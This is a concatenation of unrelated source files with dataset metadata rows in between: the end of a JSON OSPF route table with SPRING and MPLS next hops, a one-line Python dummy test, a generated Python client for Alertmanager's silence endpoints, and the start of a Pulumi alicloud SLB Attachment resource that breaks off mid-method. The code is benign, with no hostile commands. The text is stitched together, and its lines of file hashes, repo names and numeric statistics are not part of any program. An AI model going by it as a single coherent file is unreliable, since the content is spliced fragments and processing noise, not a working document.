{
"address-prefix": "10.169.14.240/32",
"interface-cost": "100",
"next-hop-type": "Spring",
"ospf-backup-next-hop": {
"ospf-backup-next-hop-address": "10.189.5.94",
"ospf-backup-next-hop-interface": "ge-0/0/0.0",
"ospf-backup-next-hop-type": "Bkup SPRING",
},
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
},
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.169.14.241/32",
"interface-cost": "105",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
},
{
"address-prefix": "10.169.14.241/32",
"interface-cost": "105",
"next-hop-type": "Spring",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
},
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.169.14.242/32",
"interface-cost": "100",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.169.14.243/32",
"interface-cost": "105",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.189.5.92/30",
"interface-cost": "5",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-name": {"interface-name": "ge-0/0/0.0"}
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.189.5.252/32",
"interface-cost": "0",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-name": {"interface-name": "lo0.0"}
},
"route-path-type": "Intra",
"route-type": "Network",
},
{
"address-prefix": "10.189.5.252/32",
"interface-cost": "0",
"next-hop-type": "Spring",
"ospf-next-hop": {
"next-hop-name": {"interface-name": "lo0.0"}
},
"route-path-type": "Intra",
"route-type": "Network",
},
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.189.5.253/32",
"interface-cost": "5",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.189.5.94"
},
"next-hop-name": {"interface-name": "ge-0/0/0.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
},
{
"address-prefix": "10.189.5.253/32",
"interface-cost": "5",
"next-hop-type": "Spring",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.189.5.94"
},
"next-hop-name": {"interface-name": "ge-0/0/0.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
},
]
},
{
"ospf-route-entry": [
{
"address-prefix": "192.168.220.0/30",
"interface-cost": "1200",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "192.168.36.119/32",
"interface-cost": "10101",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "192.168.36.120/32",
"interface-cost": "10101",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "2567",
"interface-cost": "0",
"next-hop-type": "Mpls",
"ospf-backup-next-hop": {
"ospf-backup-next-hop-address": "10.189.5.94",
"ospf-backup-next-hop-interface": "ge-0/0/0.0",
"ospf-backup-next-hop-type": "Bkup MPLS",
},
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "2567 (S=0)",
"interface-cost": "0",
"next-hop-type": "Mpls",
"ospf-backup-next-hop": {
"ospf-backup-next-hop-address": "10.189.5.94",
"ospf-backup-next-hop-interface": "ge-0/0/0.0",
"ospf-backup-next-hop-type": "Bkup MPLS",
},
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "2568",
"interface-cost": "0",
"next-hop-type": "Mpls",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "2568 (S=0)",
"interface-cost": "0",
"next-hop-type": "Mpls",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "167966",
"interface-cost": "0",
"next-hop-type": "Mpls",
"ospf-backup-next-hop": {
"ospf-backup-next-hop-address": "10.189.5.94",
"ospf-backup-next-hop-interface": "ge-0/0/0.0",
"ospf-backup-next-hop-type": "Bkup MPLS",
},
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.19.198.26"
},
"next-hop-name": {"interface-name": "ge-0/0/2.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "167966 (S=0)",
"interface-cost": "0",
"next-hop-type": "Mpls",
"ospf-backup-next-hop": {
"ospf-backup-next-hop-address": "10.189.5.94",
"ospf-backup-next-hop-interface": "ge-0/0/0.0",
"ospf-backup-next-hop-type": "Bkup MPLS",
},
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.19.198.26"
},
"next-hop-name": {"interface-name": "ge-0/0/2.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "167967",
"interface-cost": "0",
"next-hop-type": "Mpls",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.19.198.26"
},
"next-hop-name": {"interface-name": "ge-0/0/2.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "167967 (S=0)",
"interface-cost": "0",
"next-hop-type": "Mpls",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.19.198.26"
},
"next-hop-name": {"interface-name": "ge-0/0/2.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "28985",
"interface-cost": "0",
"next-hop-type": "Mpls",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.189.5.94"
},
"next-hop-name": {"interface-name": "ge-0/0/0.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "28985 (S=0)",
"interface-cost": "0",
"next-hop-type": "Mpls",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.189.5.94"
},
"next-hop-name": {"interface-name": "ge-0/0/0.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "28986",
"interface-cost": "0",
"next-hop-type": "Mpls",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.189.5.94"
},
"next-hop-name": {"interface-name": "ge-0/0/0.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "28986 (S=0)",
"interface-cost": "0",
"next-hop-type": "Mpls",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.189.5.94"
},
"next-hop-name": {"interface-name": "ge-0/0/0.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "17000",
"interface-cost": "1201",
"next-hop-type": "Mpls",
"ospf-backup-next-hop": {
"ospf-backup-next-hop-address": "10.189.5.94",
"ospf-backup-next-hop-interface": "ge-0/0/0.0",
"ospf-backup-next-hop-type": "Bkup MPLS",
},
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "16051",
"interface-cost": "100",
"next-hop-type": "Mpls",
"ospf-backup-next-hop": {
"ospf-backup-next-hop-address": "10.189.5.94",
"ospf-backup-next-hop-interface": "ge-0/0/0.0",
"ospf-backup-next-hop-type": "Bkup MPLS",
},
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "16051 (S=0)",
"interface-cost": "100",
"next-hop-type": "Mpls",
"ospf-backup-next-hop": {
"ospf-backup-next-hop-address": "10.189.5.94",
"ospf-backup-next-hop-interface": "ge-0/0/0.0",
"ospf-backup-next-hop-type": "Bkup MPLS",
},
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "16052",
"interface-cost": "105",
"next-hop-type": "Mpls",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "16061",
"interface-cost": "200",
"next-hop-type": "Mpls",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "16062",
"interface-cost": "205",
"next-hop-type": "Mpls",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "16063",
"interface-cost": "1201",
"next-hop-type": "Mpls",
"ospf-backup-next-hop": {
"ospf-backup-next-hop-address": "10.189.5.94",
"ospf-backup-next-hop-interface": "ge-0/0/0.0",
"ospf-backup-next-hop-type": "Bkup MPLS",
},
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "16072",
"interface-cost": "5",
"next-hop-type": "Mpls",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.189.5.94"
},
"next-hop-name": {"interface-name": "ge-0/0/0.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "16073",
"interface-cost": "1001",
"next-hop-type": "Mpls",
"ospf-backup-next-hop": {
"ospf-backup-next-hop-address": "10.189.5.94",
"ospf-backup-next-hop-interface": "ge-0/0/0.0",
"ospf-backup-next-hop-type": "Bkup MPLS",
},
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.19.198.26"
},
"next-hop-name": {"interface-name": "ge-0/0/2.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "16073 (S=0)",
"interface-cost": "1001",
"next-hop-type": "Mpls",
"ospf-backup-next-hop": {
"ospf-backup-next-hop-address": "10.189.5.94",
"ospf-backup-next-hop-interface": "ge-0/0/0.0",
"ospf-backup-next-hop-type": "Bkup MPLS",
},
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.19.198.26"
},
"next-hop-name": {"interface-name": "ge-0/0/2.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
]
}
}
}
| 45.454615 | 82 | 0.249835 | 3,718 | 59,091 | 3.970414 | 0.029855 | 0.165967 | 0.066319 | 0.076209 | 0.979339 | 0.977307 | 0.973107 | 0.973107 | 0.973107 | 0.962878 | 0 | 0.090121 | 0.621431 | 59,091 | 1,299 | 83 | 45.489607 | 0.569781 | 0 | 0 | 0.550423 | 0 | 0 | 0.28864 | 0.02046 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
81bd2ee20f413f75d6dddc50885598cdcc227b62 | 44 | py | Python | tests/test_dummy.py | pshen/pg_view | 04f7ae112653bf02e7911c5819aa8c2aac4aded0 | [
"Apache-2.0"
] | null | null | null | tests/test_dummy.py | pshen/pg_view | 04f7ae112653bf02e7911c5819aa8c2aac4aded0 | [
"Apache-2.0"
] | null | null | null | tests/test_dummy.py | pshen/pg_view | 04f7ae112653bf02e7911c5819aa8c2aac4aded0 | [
"Apache-2.0"
] | null | null | null | import pg_view
def test_dummy():
    """Smoke-test placeholder: succeeds as long as the module imports."""
    return None
| 7.333333 | 17 | 0.681818 | 7 | 44 | 4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.25 | 44 | 5 | 18 | 8.8 | 0.848485 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 8 |
81ccdffd104b039030b8dacb33f0a4970ea858c3 | 15,774 | py | Python | swagger_client/api/silence_api.py | voronenko-p/e-amtool | c3f201098d8f7b05ed32c391c25603cb0a7565d4 | [
"MIT"
] | 1 | 2020-05-04T08:13:16.000Z | 2020-05-04T08:13:16.000Z | swagger_client/api/silence_api.py | voronenko-p/e-amtool | c3f201098d8f7b05ed32c391c25603cb0a7565d4 | [
"MIT"
] | null | null | null | swagger_client/api/silence_api.py | voronenko-p/e-amtool | c3f201098d8f7b05ed32c391c25603cb0a7565d4 | [
"MIT"
] | 2 | 2019-03-06T23:10:20.000Z | 2020-03-03T09:37:07.000Z | # coding: utf-8
"""
Alertmanager API
API of the Prometheus Alertmanager (https://github.com/prometheus/alertmanager) # noqa: E501
OpenAPI spec version: 0.0.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from swagger_client.api_client import ApiClient
class SilenceApi(object):
    """Client for the Alertmanager silence endpoints.

    NOTE: This class was auto generated by the swagger code generator
    program and then refactored so that all endpoints share one request
    helper.  The public interface (method names, signatures, raised
    exception types and messages) is unchanged.

    Ref: https://github.com/swagger-api/swagger-codegen
    """

    # Transport-level keyword arguments accepted by every endpoint in
    # addition to its own parameters.
    _COMMON_PARAMS = ('async_req', '_return_http_data_only',
                      '_preload_content', '_request_timeout')

    def __init__(self, api_client=None):
        """Wrap *api_client*, creating a default ApiClient when omitted."""
        if api_client is None:
            api_client = ApiClient()
        self.api_client = api_client

    def _check_kwargs(self, kwargs, own_params, method_name):
        """Raise TypeError for any keyword argument the endpoint rejects.

        :param dict kwargs: keyword arguments the caller supplied
        :param tuple own_params: endpoint-specific parameter names
        :param str method_name: public method name used in the error message
        """
        allowed = set(own_params)
        allowed.update(self._COMMON_PARAMS)
        for key in kwargs:
            if key not in allowed:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method %s" % (key, method_name)
                )

    def _call(self, resource_path, http_method, path_params, query_params,
              body, response_type, kwargs, collection_formats):
        """Build the shared headers and dispatch through the ApiClient.

        Returns whatever ``ApiClient.call_api`` returns: the deserialized
        response (tuple) or a request thread when ``async_req=True``.
        """
        header_params = {
            # Both request and response bodies are JSON for this API.
            'Accept': self.api_client.select_header_accept(
                ['application/json']),
            'Content-Type': self.api_client.select_header_content_type(
                ['application/json']),
        }
        return self.api_client.call_api(
            resource_path, http_method,
            path_params,
            query_params,
            header_params,
            body=body,
            post_params=[],
            files={},
            response_type=response_type,
            auth_settings=[],  # no authentication configured for this API
            async_req=kwargs.get('async_req'),
            _return_http_data_only=kwargs.get('_return_http_data_only'),
            _preload_content=kwargs.get('_preload_content', True),
            _request_timeout=kwargs.get('_request_timeout'),
            collection_formats=collection_formats)

    def delete_silence(self, silence_id, **kwargs):  # noqa: E501
        """Delete a silence by its ID.  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_silence(silence_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str silence_id: ID of the silence to get (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.delete_silence_with_http_info(silence_id, **kwargs)  # noqa: E501
        (data) = self.delete_silence_with_http_info(silence_id, **kwargs)  # noqa: E501
        return data

    def delete_silence_with_http_info(self, silence_id, **kwargs):  # noqa: E501
        """Delete a silence by its ID, returning full HTTP info.  # noqa: E501

        :param async_req bool
        :param str silence_id: ID of the silence to get (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        :raises TypeError: on an unexpected keyword argument
        :raises ValueError: when ``silence_id`` is missing
        """
        self._check_kwargs(kwargs, ('silence_id',), 'delete_silence')
        if silence_id is None:
            raise ValueError("Missing the required parameter `silence_id` when calling `delete_silence`")  # noqa: E501
        return self._call(
            '/silence/{silenceID}', 'DELETE',
            {'silenceID': silence_id}, [],
            None, None, kwargs, {})

    def get_silence(self, silence_id, **kwargs):  # noqa: E501
        """Get a silence by its ID.  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_silence(silence_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str silence_id: ID of the silence to get (required)
        :return: GettableSilence
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.get_silence_with_http_info(silence_id, **kwargs)  # noqa: E501
        (data) = self.get_silence_with_http_info(silence_id, **kwargs)  # noqa: E501
        return data

    def get_silence_with_http_info(self, silence_id, **kwargs):  # noqa: E501
        """Get a silence by its ID, returning full HTTP info.  # noqa: E501

        :param async_req bool
        :param str silence_id: ID of the silence to get (required)
        :return: GettableSilence
                 If the method is called asynchronously,
                 returns the request thread.
        :raises TypeError: on an unexpected keyword argument
        :raises ValueError: when ``silence_id`` is missing
        """
        self._check_kwargs(kwargs, ('silence_id',), 'get_silence')
        if silence_id is None:
            raise ValueError("Missing the required parameter `silence_id` when calling `get_silence`")  # noqa: E501
        return self._call(
            '/silence/{silenceID}', 'GET',
            {'silenceID': silence_id}, [],
            None, 'GettableSilence', kwargs, {})

    def get_silences(self, **kwargs):  # noqa: E501
        """Get a list of silences.  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_silences(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param list[str] filter: A list of matchers to filter silences by
        :return: GettableSilences
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.get_silences_with_http_info(**kwargs)  # noqa: E501
        (data) = self.get_silences_with_http_info(**kwargs)  # noqa: E501
        return data

    def get_silences_with_http_info(self, **kwargs):  # noqa: E501
        """Get a list of silences, returning full HTTP info.  # noqa: E501

        :param async_req bool
        :param list[str] filter: A list of matchers to filter silences by
        :return: GettableSilences
                 If the method is called asynchronously,
                 returns the request thread.
        :raises TypeError: on an unexpected keyword argument
        """
        self._check_kwargs(kwargs, ('filter',), 'get_silences')
        query_params = []
        collection_formats = {}
        if 'filter' in kwargs:
            query_params.append(('filter', kwargs['filter']))  # noqa: E501
            # The matcher list is serialized as a comma-separated value.
            collection_formats['filter'] = 'csv'  # noqa: E501
        return self._call(
            '/silences', 'GET',
            {}, query_params,
            None, 'GettableSilences', kwargs, collection_formats)

    def post_silences(self, silence, **kwargs):  # noqa: E501
        """Post a new silence or update an existing one.  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.post_silences(silence, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param PostableSilence silence: The silence to create (required)
        :return: InlineResponse200
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.post_silences_with_http_info(silence, **kwargs)  # noqa: E501
        (data) = self.post_silences_with_http_info(silence, **kwargs)  # noqa: E501
        return data

    def post_silences_with_http_info(self, silence, **kwargs):  # noqa: E501
        """Post a new silence or update an existing one, returning full HTTP info.  # noqa: E501

        :param async_req bool
        :param PostableSilence silence: The silence to create (required)
        :return: InlineResponse200
                 If the method is called asynchronously,
                 returns the request thread.
        :raises TypeError: on an unexpected keyword argument
        :raises ValueError: when ``silence`` is missing
        """
        self._check_kwargs(kwargs, ('silence',), 'post_silences')
        if silence is None:
            raise ValueError("Missing the required parameter `silence` when calling `post_silences`")  # noqa: E501
        return self._call(
            '/silences', 'POST',
            {}, [],
            silence, 'InlineResponse200', kwargs, {})
| 36.85514 | 119 | 0.603715 | 1,810 | 15,774 | 5.014917 | 0.088398 | 0.056406 | 0.024678 | 0.031729 | 0.918145 | 0.911314 | 0.896772 | 0.883882 | 0.878815 | 0.864493 | 0 | 0.019187 | 0.306137 | 15,774 | 427 | 120 | 36.941452 | 0.810142 | 0.329466 | 0 | 0.762332 | 1 | 0 | 0.169429 | 0.027174 | 0 | 0 | 0 | 0 | 0 | 1 | 0.040359 | false | 0 | 0.017937 | 0 | 0.116592 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
c49562eb2271b7213b0610de059445e954f729e9 | 18,099 | py | Python | sdk/python/pulumi_alicloud/slb/attachment.py | pulumi/pulumi-alicloud | 9c34d84b4588a7c885c6bec1f03b5016e5a41683 | [
"ECL-2.0",
"Apache-2.0"
] | 42 | 2019-03-18T06:34:37.000Z | 2022-03-24T07:08:57.000Z | sdk/python/pulumi_alicloud/slb/attachment.py | pulumi/pulumi-alicloud | 9c34d84b4588a7c885c6bec1f03b5016e5a41683 | [
"ECL-2.0",
"Apache-2.0"
] | 152 | 2019-04-15T21:03:44.000Z | 2022-03-29T18:00:57.000Z | sdk/python/pulumi_alicloud/slb/attachment.py | pulumi/pulumi-alicloud | 9c34d84b4588a7c885c6bec1f03b5016e5a41683 | [
"ECL-2.0",
"Apache-2.0"
] | 3 | 2020-08-26T17:30:07.000Z | 2021-07-05T01:37:45.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['AttachmentArgs', 'Attachment']
@pulumi.input_type
class AttachmentArgs:
    """The set of input arguments for constructing an ``Attachment`` resource.

    NOTE(review): ``@pulumi.input_type`` introspects the getter/setter pairs
    below, and the ``pulumi.getter(name=...)`` wire names must match the
    provider schema -- do not rename them.
    """
    def __init__(__self__, *,
                 instance_ids: pulumi.Input[Sequence[pulumi.Input[str]]],
                 load_balancer_id: pulumi.Input[str],
                 backend_servers: Optional[pulumi.Input[str]] = None,
                 delete_protection_validation: Optional[pulumi.Input[bool]] = None,
                 server_type: Optional[pulumi.Input[str]] = None,
                 weight: Optional[pulumi.Input[int]] = None):
        """
        The set of arguments for constructing a Attachment resource.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] instance_ids: A list of instance ids to added backend server in the SLB.
        :param pulumi.Input[str] load_balancer_id: ID of the load balancer.
        :param pulumi.Input[str] backend_servers: The backend servers of the load balancer.
        :param pulumi.Input[bool] delete_protection_validation: Checking DeleteProtection of SLB instance before deleting. If true, this resource will not be deleted when its SLB instance enabled DeleteProtection. Default to false.
        :param pulumi.Input[str] server_type: Type of the instances. Valid value ecs, eni. Default to ecs.
        :param pulumi.Input[int] weight: Weight of the instances. Valid value range: [0-100]. Default to 100.
        """
        # Required inputs are always recorded.
        pulumi.set(__self__, "instance_ids", instance_ids)
        pulumi.set(__self__, "load_balancer_id", load_balancer_id)
        # Optional inputs are only recorded when explicitly provided;
        # None is treated as "not set" rather than stored.
        if backend_servers is not None:
            pulumi.set(__self__, "backend_servers", backend_servers)
        if delete_protection_validation is not None:
            pulumi.set(__self__, "delete_protection_validation", delete_protection_validation)
        if server_type is not None:
            pulumi.set(__self__, "server_type", server_type)
        if weight is not None:
            pulumi.set(__self__, "weight", weight)

    # The getter/setter pairs below delegate storage to the pulumi runtime
    # via pulumi.get / pulumi.set rather than plain instance attributes.
    @property
    @pulumi.getter(name="instanceIds")
    def instance_ids(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
        """
        A list of instance ids to added backend server in the SLB.
        """
        return pulumi.get(self, "instance_ids")

    @instance_ids.setter
    def instance_ids(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
        pulumi.set(self, "instance_ids", value)

    @property
    @pulumi.getter(name="loadBalancerId")
    def load_balancer_id(self) -> pulumi.Input[str]:
        """
        ID of the load balancer.
        """
        return pulumi.get(self, "load_balancer_id")

    @load_balancer_id.setter
    def load_balancer_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "load_balancer_id", value)

    @property
    @pulumi.getter(name="backendServers")
    def backend_servers(self) -> Optional[pulumi.Input[str]]:
        """
        The backend servers of the load balancer.
        """
        return pulumi.get(self, "backend_servers")

    @backend_servers.setter
    def backend_servers(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "backend_servers", value)

    @property
    @pulumi.getter(name="deleteProtectionValidation")
    def delete_protection_validation(self) -> Optional[pulumi.Input[bool]]:
        """
        Checking DeleteProtection of SLB instance before deleting. If true, this resource will not be deleted when its SLB instance enabled DeleteProtection. Default to false.
        """
        return pulumi.get(self, "delete_protection_validation")

    @delete_protection_validation.setter
    def delete_protection_validation(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "delete_protection_validation", value)

    @property
    @pulumi.getter(name="serverType")
    def server_type(self) -> Optional[pulumi.Input[str]]:
        """
        Type of the instances. Valid value ecs, eni. Default to ecs.
        """
        return pulumi.get(self, "server_type")

    @server_type.setter
    def server_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "server_type", value)

    @property
    @pulumi.getter
    def weight(self) -> Optional[pulumi.Input[int]]:
        """
        Weight of the instances. Valid value range: [0-100]. Default to 100.
        """
        return pulumi.get(self, "weight")

    @weight.setter
    def weight(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "weight", value)
@pulumi.input_type
class _AttachmentState:
    """Provider-side state for looking up and filtering ``Attachment`` resources.

    Every field is optional here (unlike ``AttachmentArgs``) because state
    lookups may be partial.
    """
    def __init__(__self__, *,
                 backend_servers: Optional[pulumi.Input[str]] = None,
                 delete_protection_validation: Optional[pulumi.Input[bool]] = None,
                 instance_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 load_balancer_id: Optional[pulumi.Input[str]] = None,
                 server_type: Optional[pulumi.Input[str]] = None,
                 weight: Optional[pulumi.Input[int]] = None):
        """
        Input properties used for looking up and filtering Attachment resources.
        :param pulumi.Input[str] backend_servers: The backend servers of the load balancer.
        :param pulumi.Input[bool] delete_protection_validation: Checking DeleteProtection of SLB instance before deleting. If true, this resource will not be deleted when its SLB instance enabled DeleteProtection. Default to false.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] instance_ids: A list of instance ids to added backend server in the SLB.
        :param pulumi.Input[str] load_balancer_id: ID of the load balancer.
        :param pulumi.Input[str] server_type: Type of the instances. Valid value ecs, eni. Default to ecs.
        :param pulumi.Input[int] weight: Weight of the instances. Valid value range: [0-100]. Default to 100.
        """
        # Only record values that were explicitly provided; None means "unset".
        if backend_servers is not None:
            pulumi.set(__self__, "backend_servers", backend_servers)
        if delete_protection_validation is not None:
